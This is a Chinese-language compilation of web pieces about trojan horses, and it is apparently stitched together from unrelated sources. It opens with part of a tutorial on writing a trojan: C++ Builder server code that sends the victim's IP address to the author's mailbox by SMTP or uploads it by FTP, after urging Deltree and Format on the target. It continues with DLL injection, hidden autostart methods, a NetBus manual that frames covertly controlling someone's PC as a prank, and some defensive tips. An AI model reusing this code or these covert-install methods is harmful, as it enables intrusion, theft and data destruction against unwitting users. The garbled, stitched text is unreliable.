file://返回“Success”信息

}

你可以直接执行什么Ping和Tracert之类的命令来进一步刺探目标机的网络状况（判断是否是一个企业的局域网），然后可以进一步攻击，比如Deltree和Format命令。^_^

到此，服务器程序的功能已全部完成，但还差容错部分未完成,这样才能避免程序因意外而崩溃。朋友，别走开！（未完待续）

木马是如何编写的（三）

武汉周侃

上次已编写完服务器端的各种功能，但还差容错部分还未完成,下面我们Go on! 其代码如下（照敲不误 ^_^）：

{

END:;

Socket-Close();

file://关闭服务

ServerSocket1-Active =true;

file://再次打开服务

if (NMSMTP1-Connected) NMSMTP1-Disconnect();

file://如果SMTP服务器已连接则断开

NMSMTP1-Host = "smtp.163.net";

file://选一个好用的SMTP服务器，如163、263、sina和btamail

NMSMTP1-UserID = "";

file://你SMTP的ID

try

{

NMSMTP1-Connect();

file://再次连接

}

catch(...)

{

goto NextTime;

file://跳到NextTime

}

NMSMTP1-PostMessage-FromAddress ="I don't know!";

file://受害者的Email地址

NMSMTP1-PostMessage-FromName = "Casualty";

file://受害者的名字

NMSMTP1-PostMessage-ToAddress-Text = "crossbow@8848.net";

file://将信发到我的邮箱，这一步很关键

NMSMTP1-PostMessage-Body-Text = AnsiString("Server Running on:") + NMSMTP1-LocalIP ;

file://信的内容提示你“服务器正在运行”，并且告诉你受害者的目前的IP地址，以便连接

NMSMTP1-PostMessage-Subject = "Server Running Now!";

file://信的主题

NMSMTP1-SendMail();

file://发送！

return;

file://返回

NextTime:

NMFTP1-Host = "";

file://你的FTP服务器的地址

NMFTP1-UserID = "";

file://你的用户ID

NMFTP1-Port = 21;

端口号，一般为21

NMFTP1-Password = "";

file://你的FTP的密码

if(NMFTP1-Connected) NMFTP1-Disconnect();

file://如果已连接就断开

try

{

NMFTP1-Connect();

file://再连接

}

catch(...)

{

return;

file://返回

}

AnsiString SendToSite = "Server Running on: " + NMFTP1-RemoteIP;

file://受害者的IP地址

FILE * Upload;

Upload = fopen(NMFTP1-RemoteIP.c_str(),"w+");

file://创建一个新文件准备写，如果已存在就覆盖

fwrite(SendToSite.c_str(),sizeof(char),SendToSite.Length(),Upload);

file://写入以上的SendToSite的内容

fclose(Upload);

file://写完后关闭此文件

NMFTP1-RemoveDir("public_html");

file://删除public_html目录

NMFTP1-Upload(NMFTP1-RemoteIP, NMFTP1-RemoteIP);

file://上传！

}

啊，超长的OnClientRead事件终于写完了。最后别忘了要在此服务器源码文件中添加以下头文件：

#include stdlib.h

#include dirent.h

#include fcntl.h

#include dos.h

#include sys\stat.h

#include winbase.h

#include stdio.h

#include process.h

#include io.h

#include mmsystem.h

至此，服务器端（Server）程序

VB.NET下如何进行远程线程注入

首先来了解远程线程注入远程线程插入（注入）技术指的是通过在另一个进程中创建远程线程的方法进入目标进程的内存地址空间。将木马程序以DLL的形式实现后，需要使用插入到目标进程中的远程线程将该木马DLL插入到目标进程的地址空间，即利用该线程通过调用Windows API LoadLibrary函数来加载木马DLL，从而实现木马对系统的侵害。这种技术一般用于外挂当外挂注入到游戏中时你的电脑也就中啦木马一般的解决方法　wmiprvse.exe是一个系统服务的进程，你可以结束任务，进程自然消失。禁用Windows Management Instrumentation Driver Extensions服务或者改为手动具体：桌面-我的电脑-管理-服务和应用程序-服务里面有个Windows Management Instrumentation 右键—禁用就可以了. 我也用过，感觉第二种方法较好。解除命令方法：同样操作复制下边的命[1][2][3]令粘贴输入，回车确定。即可、 reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmiprvse.exe” /f希望会帮到你

谁能够教我一些简单的木马知识？

木马只是两种，一时以为破坏，一时对放马者有利的，比如控制，装个AVG吧，他对这个有一套，在装个防火墙，费尔不错，在装个诺顿，卡巴最好不用，误杀大王一个，以后用问题再问我。我对这种东西研究比较高。小高手。

木马

特洛伊木马(以下简称木马)，英文叫做“Trojan horse”，其名称取自希腊神话的特洛伊木马记。

它是一种基于远程控制的黑客工具，具有隐蔽性和非授权性的特点。

所谓隐蔽性是指木马的设计者为了防止木马被发现，会采用多种手段隐藏木马，这样服务端即使发现感染了木马，由于不能确定其具体位置，往往只能望“马”兴叹。

所谓非授权性是指一旦控制端与服务端连接后，控制端将享有服务端的大部分操作权限，包括修改文件，修改注册表，控制鼠标，键盘等等，而这些权力并不是服务端赋予的，而是通过木马程序窃取的。

从木马的发展来看，基本上可以分为两个阶段。

最初网络还处于以UNIX平台为主的时期，木马就产生了，当时的木马程序的功能相对简单，往往是将一段程序嵌入到系统文件中，用跳转指令来执行一些木马的功能，在这个时期木马的设计者和使用者大都是些技术人员，必须具备相当的网络和编程知识。

而后随着WINDOWS平台的日益普及，一些基于图形操作的木马程序出现了，用户界面的改善，使使用者不用懂太多的专业知识就可以熟练的操作木马，相对的木马入侵事件也频繁出现，而且由于这个时期木马的功能已日趋完善，因此对服务端的破坏也更大了。

所以所木马发展到今天，已经无所不用其极，一旦被木马控制，你的电脑将毫无秘密可言。

鉴于木马的巨大危害性，我们将分原理篇，防御与反击篇，资料篇三部分来详细介绍木马，希望大家对特洛伊木马这种攻击手段有一个透彻的了解。

原理篇

基础知识

在介绍木马的原理之前有一些木马构成的基础知识我们要事先加以说明,因为下面有很多地方会提到这些内容。

一个完整的木马系统由硬件部分，软件部分和具体连接部分组成。

(1)硬件部分：建立木马连接所必须的硬件实体。控制端：对服务端进行远程控制的一方。服务端：被控制端远程控制的一方。 INTERNET：控制端对服务端进行远程控制，数据传输的网络载体。

(2)软件部分：实现远程控制所必须的软件程序。控制端程序：控制端用以远程控制服务端的程序。木马程序：潜入服务端内部，获取其操作权限的程序。木马配置程序：设置木马程序的端口号，触发条件，木马名称等，使其在服务端藏得更隐蔽的程序。

(3)具体连接部分：通过INTERNET在服务端和控制端之间建立一条木马通道所必须的元素。控制端IP，服务端IP：即控制端，服务端的网络地址，也是木马进行数据传输的目的地。控制端端口，木马端口：即控制端，服务端的数据入口，通过这个入口，数据可直达控制端程序或木马程序。

木马原理

用木马这种黑客工具进行网络入侵，从过程上看大致可分为六步(具体可见下图)，下面我们就按这六步来详细阐述木马的攻击原理。

一.配置木马

一般来说一个设计成熟的木马都有木马配置程序，从具体的配置内容看，主要是为了实现以下两方面功能：

(1)木马伪装：木马配置程序为了在服务端尽可能的好的隐藏木马，会采用多种伪装手段，如修改图标，捆绑文件，定制端口，自我销毁等，我们将在“传播木马”这一节中详细介绍。

(2)信息反馈：木马配置程序将就信息反馈的方式或地址进行设置，如设置信息反馈的邮件地址，IRC号，ICO号等等，具体的我们将在“信息反馈”这一节中详细介绍。

二.传播木马

(1)传播方式:

木马的传播方式主要有两种:一种是通过E-MAIL,控制端将木马程序以附件的形式夹在邮件中发送出去, 收信人只要打开附件系统就会感染木马;另一种是软件下载，一些非正规的网站以提供软件下载为名义，将木马捆绑在软件安装程序上，下载后，只要一运行这些程序，木马就会自动安装。

(2)伪装方式:

鉴于木马的危害性,很多人对木马知识还是有一定了解的,这对木马的传播起了一定的抑制作用,这是木马设计者所不愿见到的,因此他们开发了多种功能来伪装木马,以达到降低用户警觉,欺骗用户的目的。

(一)修改图标

当你在E-MAIL的附件中看到这个图标时,是否会认为这是个文本文件呢?但是我不得不告诉你,这也有可能是个木马程序,现在已经有木马可以将木马服务端程序的图标改成HTML,TXT, ZIP等各种文件的图标,这有相当大的迷惑性,但是目前提供这种功能的木马还不多见,并且这种伪装也不是无懈可击的,所以不必整天提心吊胆,疑神疑鬼的。

(二)捆绑文件

这种伪装手段是将木马捆绑到一个安装程序上,当安装程序运行时,木马在用户毫无察觉的情况下 ,偷偷的进入了系统。至于被捆绑的文件一般是可执行文件(即EXE,COM一类的文件)。

(三)出错显示

有一定木马知识的人都知道,如果打开一个文件,没有任何反应,这很可能就是个木马程序, 木马的设计者也意识到了这个缺陷,所以已经有木马提供了一个叫做出错显示的功能。当服务端用户打开木马程序时,会弹出一个如下图所示的错误提示框(这当然是假的),错误内容可自由定义,大多会定制成一些诸如“文件已破坏，无法打开的！”之类的信息，当服务端用户信以为真时,木马却悄悄侵入了系统。

(四)定制端口

很多老式的木马端口都是固定的,这给判断是否感染了木马带来了方便,只要查一下特定的端口就知道感染了什么木马,所以现在很多新式的木马都加入了定制端口的功能,控制端用户可以在1024---65535之间任选一个端口作为木马端口(一般不选1024以下的端口)，这样就给判断所感染木马类型带来了麻烦。

(五)自我销毁

这项功能是为了弥补木马的一个缺陷。我们知道当服务端用户打开含有木马的文件后，木马会将自己拷贝到WINDOWS的系统文件夹中(C:WINDOWS或C:WINDOWSSYSTEM目录下)，一般来说原木马文件和系统文件夹中的木马文件的大小是一样的(捆绑文件的木马除外),那么中了木马的朋友只要在近来收到的信件和下载的软件中找到原木马文件,然后根据原木马的大小去系统文件夹找相同大小的文件, 判断一下哪个是木马就行了。而木马的自我销毁功能是指安装完木马后，原木马文件将自动销毁，这样服务端用户就很难找到木马的来源，在没有查杀木马的工具帮助下，就很难删除木马了。

(六)木马更名

安装到系统文件夹中的木马的文件名一般是固定的，那么只要根据一些查杀木马的文章,按图索骥在系统文件夹查找特定的文件,就可以断定中了什么木马。所以现在有很多木马都允许控制端用户自由定制安装后的木马文件名，这样很难判断所感染的木马类型了。

三.运行木马

服务端用户运行木马或捆绑木马的程序后,木马就会自动进行安装。首先将自身拷贝到WINDOWS的系统文件夹中(C:WINDOWS或C:WINDOWSSYSTEM目录下),然后在注册表,启动组,非启动组中设置好木马的触发条件 ,这样木马的安装就完成了。安装后就可以启动木马了，具体过程见下图：

(1)由触发条件激活木马

触发条件是指启动木马的条件,大致出现在下面八个地方:

1.注册表:打开HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion下的五个以Run 和RunServices主键,在其中寻找可能是启动木马的键值。

2.WIN.INI:C:WINDOWS目录下有一个配置文件win.ini，用文本方式打开，在[windows]字段中有启动命令 load=和run=,在一般情况下是空白的,如果有启动程序,可能是木马。 3.SYSTEM.INI:C:WINDOWS目录下有个配置文件system.ini，用文本方式打开，在[386Enh],[mic]， [drivers32]中有命令行,在其中寻找木马的启动命令。

4.Autoexec.bat和Config.sys:在C盘根目录下的这两个文件也可以启动木马。但这种加载方式一般都需要控制端用户与服务端建立连接后，将已添加木马启动命令的同名文件上传到服务端覆盖这两个文件才行。

5.*.INI:即应用程序的启动配置文件，控制端利用这些文件能启动程序的特点，将制作好的带有木马启动命令的同名文件上传到服务端覆盖这同名文件，这样就可以达到启动木马的目的了。

6.注册表:打开HKEY_CLASSES_ROOT文件类型\shellopencommand主键,查看其键值。举个例子,国产木马“冰河”就是修改HKEY_CLASSES_ROOT xtfileshellopencommand下的键值,将“C :WINDOWS NOTEPAD.EXE %1”该为“C:WINDOWSSYSTEMSYXXXPLR.EXE %1”，这时你双击一个TXT文件后，原本应用NOTEPAD打开文件的，现在却变成启动木马程序了。还要说明的是不光是TXT文件，通过修改HTML，EXE，ZIP等文件的启动命令的键值都可以启动木马，不同之处只在于“文件类型”这个主键的差别，TXT是txtfile,ZIP是WINZIP，大家可以试着去找一下。

7.捆绑文件:实现这种触发条件首先要控制端和服务端已通过木马建立连接，然后控制端用户用工具软件将木马文件和某一应用程序捆绑在一起，然后上传到服务端覆盖原文件，这样即使木马被删除了，只要运行捆绑了木马的应用程序，木马又会被安装上去了。

8.启动菜单:在“开始---程序---启动”选项下也可能有木马的触发条件。

(2)木马运行过程

木马被激活后，进入内存，并开启事先定义的木马端口，准备与控制端建立连接。这时服务端用户可以在MS-DOS方式下，键入NETSTAT -AN查看端口状态，一般个人电脑在脱机状态下是不会有端口开放的，如果有端口开放，你就要注意是否感染木马了。下面是电脑感染木马后，用NETSTAT命令查看端口的两个实例：

其中①是服务端与控制端建立连接时的显示状态，②是服务端与控制端还未建立连接时的显示状态。

在上网过程中要下载软件，发送信件，网上聊天等必然打开一些端口，下面是一些常用的端口：

(1)1---1024之间的端口：这些端口叫保留端口，是专给一些对外通讯的程序用的，如FTP使用21， SMTP使用25，POP3使用110等。只有很少木马会用保留端口作为木马端口的。

(2)1025以上的连续端口：在上网浏览网站时，浏览器会打开多个连续的端口下载文字，图片到本地硬盘上，这些端口都是1025以上的连续端口。

(3)4000端口：这是OICQ的通讯端口。

(4)6667端口：这是IRC的通讯端口。除上述的端口基本可以排除在外，如发现还有其它端口打开，尤其是数值比较大的端口，那就要怀疑是否感染了木马，当然如果木马有定制端口的功能，那任何端口都有可能是木马端口。

四.信息泄露:

一般来说，设计成熟的木马都有一个信息反馈机制。所谓信息反馈机制是指木马成功安装后会收集一些服务端的软硬件信息，并通过E-MAIL，IRC或ICO的方式告知控制端用户。

从反馈信息中控制端可以知道服务端的一些软硬件信息，包括使用的操作系统，系统目录，硬盘分区况，系统口令等，在这些信息中，最重要的是服务端IP，因为只有得到这个参数，控制端才能与服务端建立连接，具体的连接方法我们会在下一节中讲解。

五.建立连接：

这一节我们讲解一下木马连接是怎样建立的。一个木马连接的建立首先必须满足两个条件：一是服务端已安装了木马程序；二是控制端，服务端都要在线。在此基础上控制端可以通过木马端口与服务端建立连接。

假设A机为控制端，B机为服务端，对于A机来说要与B机建立连接必须知道B机的木马端口和IP地址，由于木马端口是A机事先设定的，为已知项，所以最重要的是如何获得B机的IP地址。获得B机的IP 地址的方法主要有两种：信息反馈和IP扫描。对于前一种已在上一节中已经介绍过了，不再赘述，我们重点来介绍IP扫描，因为B机装有木马程序，所以它的木马端口7626是处于开放状态的，所以现在A机只要扫描IP地址段中7626端口开放的主机就行了，例如图中B机的IP地址是202.102.47.56，当A机扫描到这个IP时发现它的7626端口是开放的，那么这个IP就会被添加到列表中，这时A机就可以通过木马的控制端程序向B机发出连接信号，B机中的木马程序收到信号后立即作出响应，当A机收到响应的信号后，开启一个随即端口1031与B机的木马端口7626建立连接，到这时一个木马连接才算真正建立。值得一提的要扫描整个IP地址段显然费时费力，一般来说控制端都是先通过信息反馈获得服务端的IP地址，由于拨号上网的IP是动态的，即用户每次上网的IP都是不同的，但是这个IP是在一定范围内变动的，如图中 B机的IP是202.102.47.56，那么B机上网IP的变动范围是在202.102.000.000---202.102.255.255，所以每次控制端只要搜索这个IP地址段就可以找到B机了。

六.远程控制：

木马连接建立后，控制端端口和木马端口之间将会出现一条通道。

控制端上的控制端程序可藉这条通道与服务端上的木马程序取得联系,并通过木马程序对服务端进行远程控制。下面我们就介绍一下控制端具体能享有哪些控制权限，这远比你想象的要大。

(1)窃取密码：一切以明文的形式，*形式或缓存在CACHE中的密码都能被木马侦测到，此外很多木马还提供有击键记录功能，它将会记录服务端每次敲击键盘的动作，所以一旦有木马入侵，密码将很容易被窃取。

(2)文件操作：控制端可藉由远程控制对服务端上的文件进行删除,新建,修改,上传,下载,运行,更改属性等一系列操作,基本涵盖了WINDOWS平台上所有的文件操作功能。

(3)修改注册表：控制端可任意修改服务端注册表，包括删除，新建或修改主键，子键，键值。有了这项功能控制端就可以禁止服务端软驱，光驱的使用，锁住服务端的注册表，将服务端上木马的触发条件设置得更隐蔽的一系列高级操作。

(4)系统操作：这项内容包括重启或关闭服务端操作系统，断开服务端网络连接，控制服务端的鼠标，键盘，监视服务端桌面操作，查看服务端进程等，控制端甚至可以随时给服务端发送信息，想象一下，当服务端的桌面上突然跳出一段话，不吓人一跳才怪

木马和病毒都是一种人为的程序,都属于电脑病毒,为什么木马要单独提出来说内?大家都知道以前的电脑病毒的作用,其实完全就是为了搞破坏,破坏电脑里的资料数据,除了破坏之外其它无非就是有些病毒制造者为了达到某些目的而进行的威慑和敲诈勒索的作用,或为了炫耀自己的技术. "木马"不一样,木马的作用是赤裸裸的偷偷监视别人和盗窃别人密码,数据等,如盗窃管理员密码-子网密码搞破坏,或者好玩,偷窃上网密码用于它用,游戏帐号,股票帐号,甚至网上银行帐户等.达到偷窥别人隐私和得到经济利益的目的.所以木马的作用比早期的电脑病毒更加有用.更能够直接达到使用者的目的!导致许多别有用心的程序开发者大量的编写这类带有偷窃和监视别人电脑的侵入性程序,这就是目前网上大量木马泛滥成灾的原因.鉴于木马的这些巨大危害性和它与早期病毒的作用性质不一样,所以木马虽然属于病毒中的一类,但是要单独的从病毒类型中间剥离出来.独立的称之为"木马"程序.

一般来说一种杀毒软件程序,它的木马专杀程序能够查杀某某木马的话,那么它自己的普通杀毒程序也当然能够杀掉这种木马,因为在木马泛滥的今天,为木马单独设计一个专门的木马查杀工具,那是能提高该杀毒软件的产品档次的,对其声誉也大大的有益,实际上一般的普通杀毒软件里都包含了对木马的查杀功能.如果现在大家说某某杀毒软件没有木马专杀的程序,那这家杀毒软件厂商自己也好象有点过意不去,即使它的普通杀毒软件里当然的有杀除木马的功能.

还有一点就是,把查杀木马程序单独剥离出来,可以提高查杀效率,现在很多杀毒软件里的木马专杀程序只对木马进行查杀,不去检查普通病毒库里的病毒代码,也就是说当用户运行木马专杀程序的时候,程序只调用木马代码库里的数据,而不调用病毒代码库里的数据,大大提高木马查杀速度.我们知道查杀普通病毒的速度是比较慢的,因为现在有太多太多的病毒.每个文件要经过几万条木马代码的检验,然后再加上已知的差不多有近10万个病毒代码的检验,那速度岂不是很慢了.省去普通病毒代码检验,是不是就提高了效率,提高了速度内? 也就是说现在好多杀毒软件自带的木马专杀程序只查杀木马而一般不去查杀病毒,但是它自身的普通病毒查杀程序既查杀病毒又查杀木马!

隐形”木马启动方式揭秘

大家所熟知的木马程序一般的启动方式有：加载到“开始”菜单中的“启动”项、记录到注册表的[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]项和[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]项中，更高级的木马还会注册为系统的“服务”程序，以上这几种启动方式都可以在“系统配置实用程序”(在“开始→运行”中执行“Msconfig”)的“启动”项和“服务”项中找到它的踪迹。

另一种鲜为人知的启动方式，是在“开始→运行”中执行“Gpedit.msc”。打开“组策略”，可看到“本地计算机策略”中有两个选项：“计算机配置”与“用户配置”，展开“用户配置→管理模板→系统→登录”，双击“在用户登录时运行这些程序”子项进行属性设置，选定“设置”项中的“已启用”项并单击“显示”按钮弹出“显示内容”窗口，再单击“添加”按钮，在“添加项目”窗口内的文本框中输入要自启动的程序的路径，如图所示，单击“确定”按钮就完成了。

添加需要启动的文件面

重新启动计算机，系统在登录时就会自动启动你添加的程序，如果刚才添加的是木马程序，那么一个“隐形”木马就这样诞生了。因为用这种方式添加的自启动程序在系统的“系统配置实用程序”是找不到的，同样在我们所熟知的注册表项中也是找不到的，所以非常危险。

通过这种方式添加的自启动程序虽然被记录在注册表中，但是不在我们所熟知的注册表的[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]项和[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]项内，而是在册表的[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]项。如果你怀疑你的电脑被种了“木马”，可是又找不到它在哪儿，建议你到注册表的[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]项里找找吧，或是进入“组策略”的“在用户登录时运行这些程序”看看有没有启动的程序。

特洛伊木马NetBus v.1.60的中文说明

概述

此程序是一个遥控管理工具,更是一个在局域网或在全球因特网上同朋友逗乐的软件.

安装

NetBus包含服务器和客户机部分,服务器必须安装在你想逗乐的人的计算机上.客户机属你掌握,它是控

制目标计算机的好程序.

把NetSever服务器,Patch.exe(可更名),放入目标计算机的任意位置并运行它,缺省时安装在Windows中,

以更开机时自动运行. 把NetSever客户机,装在自己的计算机里.开始NetBus,联结你选择的域名或(IP地

址);如果Patch已在你联结的目标计算机中已运行. 让我们开始逗乐!

注意:你看不到Patch在运行-它Windows开始时自动运行,并隐藏.

Netbus和Patch使用TCP/IP协议.因此,你的地址有域名或IP号.NetBus会用Connect按钮把你和某人联上.

功能

*弹开/关闭CD-ROM一次或间隔性自动开关.

*显示所选择的图象,如果你没有图像文件的路径,可在Pacth的目录中找.支持BMP和JPG格式.

*交换鼠标按钮-鼠标右键变成鼠标左键的功能.

*开始所选择的应用程序.

*播放所选择的声音文件, 如果你没有声音文件的路径,可在Pacth的目录中找.支持WAV格式.

*点击所选的鼠标坐标,你甚至可你的鼠标在目标计算机中运行.

*在银屏上显示对话框,回答会返回你的计算机中.

*关闭系统,删除用户记录等.

*用缺省网络浏览器,浏览所选择的URL.

*发送键盘输入的信息到目标计算机中的活动应用程序中!

*监视对方的键盘输入的信息,并发回到你的计算机.

*清屏!(连接速度慢时禁用).

*获取目标计算机中的信息.

*上载你的文件到目标计算机中!用此功能,可上载Patch的最新版本.

*增大和减少声音音量.

*记录麦克风的声音,并将声音返回.

*按一次键每次有声音.

*下载和删除目标中的任何文件.你能下载/删除在目标计算机硬盘中所选择的文件.

*键盘禁用功能.

*密码保护管理.

*记录键盘活动

*显示,死机和集中系统中的窗囗.

上述功能一些选项在执行时,(逻辑排异),可能会延迟几秒.

连接

Connect按钮有个很好的特点,它能扫描NetBus计算机中的IP地址.一旦连接它会停止扫描.IP扫描的

参数是xx.xx.xx.xx+xx,等.

127.0.0.1+15 将扫描IP地址的范围是127.0.0.1到 127.0.0.16

但是木马大多数杀毒软件杀不到,我推荐木马杀客\木马克星.

木马后来会将电脑变成一只"肉鸡",任幕后人控制,只要你连了网,他就可以肆意控制你的主机,只有拔电源才不会被控制.

___________________________________________________________________________________________________________现在网页木马无非有以下几种方式中到你的机器里

1：把木马文件改成BMP文件，然后配合你机器里的DEBUG来还原成EXE，网上存在该木马20%

2：下载一个TXT文件到你机器，然后里面有具体的FTP^-^作，FTP连上他们有木马的机器下载木马，网上存在该木马20%

3：也是最常用的方式，下载一个HTA文件，然后用网页控件解释器来还原木马。该木马在网上存在50%以上

4：采用JS脚本，用VBS脚本来执行木马文件，该型木马偷QQ的比较多，偷传奇的少，大概占10%左右

5：其他方式未知。。。。。。。。。。。。。

现在我们来说防范的方法。。。。。。。。。不要丢金砖

那就是把 windows\system\mshta.exe文件改名，

改成什么自己随便 (s个屁和瘟2000是在system32下)

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\ 下为Active Setup controls创建一个基于CLSID的新键值 {6E449683_C509_11CF_AAFA_00AA00 B6015C}，然后在新键值下创建一个REG_DWORD 类型的键Compatibility，并设定键值为0x00000400即可。

还有windows\command\debug.exe和windows\都给改个名字 (或者删除)

一些最新流行的木马最有效果的防御~~

比如网络上流行的木马 smss.exe 这个是其中一种木马的主体潜伏在 98/winme/xp c:\windows目录下 2000 c:\winnt .....

假如你中了这个木马首先我们用进程管理器结束正在运行的木马smss.exe 然后在C:\windows 或 c:\winnt\目录下创建一个假的 smss.exe 并设置为只读属性~ （2000/XP NTFS的磁盘格式的话那就更好可以用“安全设置” 设置为读取）这样木马没了~ 以后也不会在感染了这个办法本人测试过对很多木马

都很有效果的

经过这样的修改后，我现在专门找别人发的木马网址去测试，实验结果是上了大概20个木马网站，有大概15个瑞星会报警，另外5个瑞星没有反映，而我的机器没有添加出来新的EXE文件，也没有新的进程出现，只不过有些木马的残骸留在了IE的临时文件夹里，他们没有被执行起来，没有危险性，所以建议大家经常清理临时文件夹和IE